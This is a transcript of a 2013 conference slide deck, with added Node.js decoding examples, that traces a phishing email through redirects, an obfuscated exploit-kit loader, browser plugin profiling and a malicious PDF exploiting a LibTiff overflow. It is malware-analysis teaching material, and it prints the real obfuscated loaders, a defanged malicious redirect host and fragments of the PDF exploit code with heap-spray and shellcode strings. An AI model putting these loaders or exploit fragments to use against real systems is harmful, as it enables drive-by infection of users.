Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Analyzing Phishing & Malware Attacks For Neither Fun Nor Profit, Lee Brotherston (@leEb_public)

Description

Slides to accompany my talk given to TASK.to on 25th Sept 2013. I discuss tracking an attempted

Transcript of Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Page 1: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Analyzing Phishing & Malware Attacks For Neither Fun Nor Profit

Lee Brotherston, @leEb_public

Page 2: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Obligatory “where I work” slide

Page 3: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Introduction

• What is meant by Malware & Phishing?

• Responding with Malware & Phishing?

• Case study + bonus tangents

• Questions

Page 4: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Malware Response Steps

During:

• Assess if attack was successful

• Assess impact to users/network

• Contain & Remediate

Afterwards:

• Examine what worked

• Examine what failed

• Improve processes, procedures & tools

Page 5: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Anatomy of a phish

Attacker sends phishing emails

Target (user) clicks on one of the links

Redirects & Obfuscation

The “real” phishing site

Harvest information

Drop Malware

Bad Things!!

Page 6: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Tangent #1 – Stanley Milgram

Page 7: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study - Email

Page 8: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study – OPSEC

• Virtualised Environments (are not a panacea)

• No, not a real browser….. No.

• wget, curl, nslookup, socat & telnet are your friends

(--user-agent=“…” is also your friend)

Page 9: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study - Redirection

curl --dump-header header.txt --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" hxxp://xn--80ahaobzXXXXXXX.XX--XXXX/

Page 10: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study - Redirection

<html>
<title>Redirecting to ACH details, please wait.....</title>
<script type="text/javascript">
<!--
location.replace("hxxp://EVILMALWARESITE.COM/ensure/bulletin-isolate.php");
//-->
</script>
<noscript>
<meta http-equiv="refresh" content="0; url=hxxp://EVILMALWARESITE.COM/ensure/bulletin-isolate.php">
</noscript>

Page 11: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study – EvilMalwareSite.com

<body><i></i><b>
[several hundred comma-separated integers (the encoded payload) omitted]
</b>

<script>try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}
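As an added example (not part of the deck), the decoder script above can be run under Node against a constructed `<b>` payload, provided the fake `document` reproduces the one browser behaviour the script depends on: assigning to `document.body` throws, so the `catch` block is the real code path and a plain-object emulator never reaches it. The payload, `makeDocument`, `runDecoder` and `decodeOffsetList` are all constructed here; `DECODER` is the slide's script verbatim.

```javascript
// Added example, not from the deck: run the slide's <b>-payload decoder in Node
// against a constructed payload, with a fake `document` that behaves like a browser
// in the one way the decoder depends on. The decoder lives inside
// try{document.body--}catch(...){...}: in a browser the store half of `body--`
// throws (document.body only accepts a <body>/<frameset> element), so the catch
// block is the real code path. A plain-object document never throws, and a naive
// emulator therefore sees nothing happen.

// Constructed sample (not the deck's real payload): every value is charCode - 1,
// the encoding the decoder reverses with `a[j] = 1 + 0x1 * a[j]`.
const HIDDEN_MARKUP = '<param name="movie" value="hxxp://example.invalid/x.swf">';
const ENCODED = Array.from(HIDDEN_MARKUP, ch => ch.charCodeAt(0) - 1).join(',');
const SAMPLE_HTML = '<body><i></i><b>' + ENCODED + '</b>';

// The decoder exactly as shown on the slide (first script of page 22).
const DECODER =
  'try{document.body--}catch(dv32r3){' +
  'a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"](",");' +
  'for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}' +
  'ff="f";a=String[ff+"romCharCode"].apply(String,a);' +
  'd=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}';

// Minimal document stand-in. With browserish=true, assigning to body throws the
// way a real DOM does; with browserish=false, body is an ordinary property.
function makeDocument(html, browserish) {
  const body = { children: [], appendChild(el) { this.children.push(el); } };
  const doc = {
    getElementsByTagName(tag) {
      const re = new RegExp('<' + tag + '>([\\s\\S]*?)</' + tag + '>', 'gi');
      const found = [];
      let m;
      while ((m = re.exec(html)) !== null) found.push({ innerHTML: m[1] });
      return found;
    },
    createElement(tag) { return { tagName: tag.toUpperCase(), innerHTML: '' }; },
  };
  if (browserish) {
    Object.defineProperty(doc, 'body', {
      get() { return body; },
      set(_v) { throw new TypeError('document.body must be a body element'); },
    });
  } else {
    doc.body = body;
  }
  return doc;
}

// Runs the decoder with `document` shadowed by the fake and returns the innerHTML
// of whatever it appended to body, i.e. the markup the exploit page builds at runtime.
function runDecoder(script, doc) {
  new Function('document', script)(doc);
  const body = doc.body;
  return body && Array.isArray(body.children) ? body.children.map(el => el.innerHTML) : [];
}

// Pure reimplementation of the arithmetic, for when you would rather not execute the
// attacker's script at all: split on commas, add one, map to characters.
function decodeOffsetList(csv) {
  return csv.split(',')
    .filter(tok => tok.trim() !== '')
    .map(tok => String.fromCharCode(1 + Number(tok)))
    .join('');
}

console.log('browser-like document:', runDecoder(DECODER, makeDocument(SAMPLE_HTML, true)));
console.log('plain-object document:', runDecoder(DECODER, makeDocument(SAMPLE_HTML, false)));
console.log('static decode matches:', decodeOffsetList(ENCODED) === HIDDEN_MARKUP);
```

The second console line is the point: an emulator whose `document.body` accepts any value reports an empty page, which is why the deck recommends real tools in a throwaway VM over guessing from a sandbox.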

Page 12: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Tangent #2 - Obfuscation

<script>document.write('Hello World');
</script>

Page 13: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Tangent #2 - Obfuscation

<script>document.write('Hel'+'lo Wo'+'rld');
</script>

Page 14: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Tangent #2 - Obfuscation

<script>var naughty =
"document.write('Hel'+'lo Wo'+'rld');";
eval(naughty);
</script>

Page 15: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Tangent #2 - Obfuscation

<script>var encodedNaughty =
"646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";
var naughty ='';
for (var i = 0; i < encodedNaughty.length; i += 2)
naughty += String.fromCharCode(parseInt(encodedNaughty.substr(i, 2), 16));
eval(naughty);</script>

Page 16: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Tangent #2 - Obfuscation

<script>var a = "646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";
var aa ='';
for (var aaa = 0; aaa < a.length; aaa += 2)
aa += String.fromCharCode(parseInt(a.substr(aaa, 2), 16));
eval(aa);</script>

Page 17: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Tangent #2 - Obfuscation

<script>var a =
"646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";
z=eval;
var aa ='';
for (var aaa = 0; aaa < a.length; aaa += 2)
aa += String.fromCharCode(parseInt(a.substr(aaa, 2), 16));
z(aa);</script>

Page 18: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Tangent #2 - Obfuscation

<script>var a="646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";z=eval;var aa='';for (var aaa=0;aaa<a.length;aaa+= 2)aa+=String.fromCharCode(parseInt(a.substr(aaa,2),16));z(aa);</script>

====

<script>document.write('Hello World');
</script>

Page 19: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Deobfuscating Example - Revelo

Page 20: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Deobfuscating GK - Revelo

Page 21: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

What Happened?

Page 22: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study

<script>try{document.body--}catch(dv32r3)
{a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}
</script>

<script>z=eval;ss=String;function vq(){for(i=0;i<a.length;i++)
{if(az)zz();}}gg=("getEl"+"ementsByTagName");function zzz(){dd=document;try{dd.body-=12}catch(xq){a=dd[gg]("div");a=a[0].innerHTML;}a=a.split(".");}nul="0"+"x";function zz(){s+=(ss.fromCharCode((-35-2)+z(nul+a[i])));}
</script>

<script>s="";zzz();az=1;try{caewbtew=~2;}catch(vava){az=0;}vq();u=z;uu=s;if(az)u(uu);</script>

Page 23: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study

<script>
  try {
    document.body--
  } catch (dv32r3) {
    a = document[("getEl" + "ementsByTagName")]("b")[0].innerHTML["split"](",");
    for (j = 0; a["length"] > j; j++) {
      a[j] = 1 + 0x1 * a[j];
    }
    ff = "f";
    a = String[ff + "romCharCode"].apply(String, a);
    d = document.createElement("span");
    document["body"].appendChild(d);
    d["innerHTML"] = a;
  }

  z = eval;
  ss = String;

  function vq() { . . . . . . . . . . . . . . . . . .

Page 24: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study – Quick & Dirty Deobfuscate…

z = eval;

u = z;

if (az) u(uu);

u = eval; uu = decoded script

if(az) document.write('<code>'+uu+'</code>');
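The same swap, done in Node rather than by editing the page: the script runs with `eval` shadowed by a function that records its argument instead of executing it, so `z = eval; ... z(aa)` hands over the decoded layer. This is an added example, not code from the deck; the input is the one-liner from the "Tangent #2" slide, and `captureEval` and `unwrapLayers` are constructed here.

```javascript
// Added example, not from the deck: the "quick & dirty" trick from the slide, done in
// Node instead of a browser. The obfuscated script is run with `eval` shadowed by a
// function that records its argument instead of executing it, so `z = eval; ... z(aa)`
// hands us the decoded layer. As the OPSEC slide says, do this in a disposable VM.

// Input: the one-liner from the "Tangent #2" slide (page 18), used here as the sample.
const SAMPLE =
  'var a="646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";' +
  "z=eval;var aa='';for (var aaa=0;aaa<a.length;aaa+= 2)" +
  'aa+=String.fromCharCode(parseInt(a.substr(aaa,2),16));z(aa);';

// Runs one layer. `eval` and `document` are function parameters, so inside the
// script they resolve to our stand-ins rather than the real globals. (A parameter
// may be named `eval` in sloppy-mode code, and `new Function` bodies are sloppy.)
function captureEval(script) {
  const captured = [];
  const recordingEval = code => { captured.push(String(code)); return undefined; };
  const fakeDocument = { write() {}, writeln() {} };
  new Function('eval', 'document', script)(recordingEval, fakeDocument);
  return captured;
}

// Peels layers while the decoded script still contains an eval sink: each captured
// layer is fed back in, just as you would re-apply the u(uu) -> document.write swap
// to a decoded script that turns out to be another loader.
function unwrapLayers(script, maxLayers = 5) {
  const layers = [];
  let current = script;
  for (let depth = 0; depth < maxLayers; depth++) {
    const captured = captureEval(current);
    if (captured.length === 0) break;          // nothing reached eval: done
    layers.push(...captured);
    current = captured[captured.length - 1];
    if (!/\beval\b/.test(current)) break;      // final layer is plain page code
  }
  return layers;
}

console.log(unwrapLayers(SAMPLE)); // [ "document.write('Hel'+'lo Wo'+'rld');" ]
```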

Page 25: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Et Voila!

pdpd={version:"0.7.9",name:"pdpd",handler:function(c,b,a){return function(){c(b,a)}},openTag:"<",isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b)

. . . . . .

Page 26: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Edited Highlights

flash: {
  mimeType: "application/x-shockwave-flash",
  progID: "ShockwaveFlash.ShockwaveFlash",
  classID: "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",
  getVersion: function () {

adobereader: {
  mimeType: "application/pdf",

java: {
  mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],

Page 27: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Socat - the quick (cheats) way

$ socat TCP4-LISTEN:8080 -

GET http://EVILMALWARESITE.COM/ensure/bulletin-isolate.php?jnlp=7dff3c2e22 HTTP/1.1
accept-encoding: gzip
Host: evilmalwaresite.com
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_21
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive

Page 28: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study – Summary so far

• Redirects

• Obtains obfuscated script

• De-obfuscates script

• Profiles the browser (which browser, ActiveX, Flash, Java, MediaPlayer plugins, Acrobat Reader, etc)

• Collects versions & configuration of the plugins

• Rewrites the current page

• Embeds the payload (PDF)

Page 29: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study – AntiVirus

Page 30: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study – Payload

• VirusTotal
– LibTiff Integer Overflow
– PDF:Exploit.PDF-JS.AAH
– PDF/Blacole-FHJ!811825B7A717
– Exploit:Win32/CVE-2010-0188

Page 31: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study – Payload

• Malware Tracker:
– 111.0@4334: suspicious.javascript in XFA block
– 111.0@4334: suspicious.warning: object contains JavaScript

• Let’s extract the XFA block

Page 32: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

MalwareScanner - XFA

Page 33: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

XFA Block – here we go again!

<script contentType='application/x-javascript'>
if(this.execInitialize()===null)if(ImageField1.ZZA(321,513613,"a")===0){x='eI';zz="y";z=event&#46;target;}
xs="\x65";
dd="Co"+"de";
ddd="ar";
s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";
xx=s[2].concat('a',"l");

Page 34: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

XFA Block - Obfuscation

s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";

String["fr"['c'+'o'+"nca"+s[3]]…

String["fr"['conca'+s[3]]…

String["fr"['concat']…

Page 35: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

XFA Block – Obfuscation

function ZZA(){return 2-2;}

sq=z[xs+xx]
xs="\x65";
xx=s[2].concat('a',"l");

sq=eval;

Hex “e”
s[2] = “v”

Page 36: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

XFA Block - Obfuscation

if(this.execInitialize()===null)if(ImageField1.ZZA(321,513613,"a")===0){x='eI';zz="y";z=event&#46;target;}

====

if(1){x='eI';zz="y";z=event&#46;target;}

Or

if(0){x='eI';zz="y";z=event&#46;target;}

Page 37: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

XFA Block – Just Won’t Run

z=event&#46;target; <- Makes IE Barf

&#46; == .

z=event.target;

Page 38: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

XFA Block - Obfuscation

a=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZA(('2'),00),ZA(('7'),00),ZA(('6'),01),ZA(('6'),04),ZA(('6'),04),ZA(('6'),011)……

function ZA(a,b) {
a+=b;
sq=z[xs+xx]("\x70ar"+"s"+x+s[0]+s[1]);
return sq(a,16);
}

Page 39: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Let’s try some guesswork

function ZA(a,b){
a+=b;
document.write(String.fromCharCode(parseInt(a, 16)));
}

ZA(('7'),06)    Hex 76 == ‘v’
ZA(('6'),01)    Hex 61 == ‘a’
ZA(('7'),02)    Hex 72 == ‘r’
ZA(('2'),00)    Hex 20 == Space
ZA(('7'),00)    Hex 70 == ‘p’
ZA(('6'),01)    Hex 61 == ‘a’
ZA(('6'),04)    Hex 64 == ‘d’
ZA(('6'),04)    Hex 64 == ‘d’
ZA(('6'),011)   ????
ZA(('6'),E)     Hex 6E == ‘n’
ZA(('6'),7)     Hex 67 == ‘g’

‘i’ == Hex 69; Octal 011 == Hex 9
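The guesswork above, done statically over the `a=[ZA(...)...]` text instead of by running `ZA` (an added example, not from the deck): the second argument of each call is a JavaScript number literal, so a leading zero makes it legacy octal, which is exactly the `011` trap the slide hits. The regex, `secondArgValue` and `decodeZaCalls` are constructed here, and a bare identifier such as `E` is assumed to stand for that hex digit, which is the slide's own guess.

```javascript
// Added example, not from the deck: decode the ZA(('h'),n) list from the XFA block
// without executing it. Each call glues a hex digit to its second argument and parses
// the pair as hex. The second arguments are written as number literals, so a leading
// zero makes them legacy octal (011 is 9, not 11, hence '69' -> 'i'). Identifiers such
// as E are not resolvable from the slide; they are assumed to name that hex digit.

// Argument list as shown on the "XFA Block - Obfuscation" and guesswork slides.
const ZA_CALLS =
  "a=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZA(('2'),00),ZA(('7'),00)," +
  "ZA(('6'),01),ZA(('6'),04),ZA(('6'),04),ZA(('6'),011),ZA(('6'),E),ZA(('6'),7)]";

// Evaluates a second-argument token the way a sloppy-mode engine would, without eval:
// leading-zero digit runs are legacy octal, other digit runs are decimal, and anything
// else is an identifier whose value we can only guess (assumed: the hex digit it names).
function secondArgValue(token) {
  if (/^0[0-7]+$/.test(token)) return { text: String(parseInt(token, 8)), guessed: false };
  if (/^[0-9]+$/.test(token)) return { text: String(parseInt(token, 10)), guessed: false };
  return { text: token, guessed: true };
}

// Walks every ZA(('h'),arg) call, rebuilds the hex pair and maps it to a character.
// Returns the decoded text plus the identifiers whose values had to be guessed, so
// the analyst knows which characters are unverified.
function decodeZaCalls(source) {
  const re = /ZA\(\('([0-9a-fA-F])'\),\s*([0-9A-Za-z_$]+)\)/g;
  const guesses = [];
  let out = '';
  let m;
  while ((m = re.exec(source)) !== null) {
    const { text, guessed } = secondArgValue(m[2]);
    const hex = m[1] + text;            // '7' + '6' -> '76'
    const code = parseInt(hex, 16);     // 0x76 -> 118 -> 'v'
    if (guessed) guesses.push(m[2]);
    out += Number.isNaN(code) ? '?' : String.fromCharCode(code);
  }
  return { text: out, guesses };
}

console.log(decodeZaCalls(ZA_CALLS)); // { text: 'var padding', guesses: [ 'E' ] }
```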

Page 40: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

That seemed to work! (mostly)

var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 =
"4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + ".split('').reverse().join('').replace(/;/g, '');
_l3 = app;
_l4 = new Array();
function _l5() {
  var _l6 = _l3.viewerVersion.toString();
  _l6 = _l6.replace('.', '');
  while (_l6.length < 4) _l6 += '0';
  return parseInt(_l6, 10)
}
function _l7(_l8, _l9) {
  while (_l8.length * 2 < _l9) _l8 += _l8;
  return _l8.substring(0, _l9 / 2)
……..

Page 41: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Exploit Code – Observations

• No real obfuscation

• No fake functions, variables or other distractions.

• Nearly all string manipulation.

Page 42: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Exploit - Samples

var padding;

var pointers_a, i;

loxWhee = _I1 + spray;

ImageField1.rawValue = _ll1

Page 43: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study – Payload

• Uses a LibTiff Overflow

• Executes arbitrary code, which…

• Downloads and executes a .dll of the attacker's choice…

Game Over

Page 44: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Tangent #3 – Game Over?

Source: XKCD

Page 45: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Case Study – 2 weeks later…

Page 46: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

A breach timeline

Source: Verizon 2013 Data Breach Information Report

Page 47: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Is this isolated?

Page 48: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

But do people actually click?

Source: Verizon 2013 Data Breach Information Report

Page 49: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

The “best” Phish

Page 50: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Resources

Socat: http://www.dest-unreach.org/socat/

VirusTotal: http://www.virustotal.com/

Revelo: http://www.kahusecurity.com/

Malzilla: http://malzilla.sourceforge.net/

curl/wget: Your local package management tool

Malware Tracker: http://malwaretracker.com/

Javascript Beautifier: http://jsbeautifier.org/

Javascript Unpack: http://jsunpack.jeek.org

DBIR: http://www.verizonenterprise.com/DBIR/2013/

Page 51: Analysing Phishing & Malware Attacks for Neither Fun nor Profit

Thank you for your time.

Any Questions?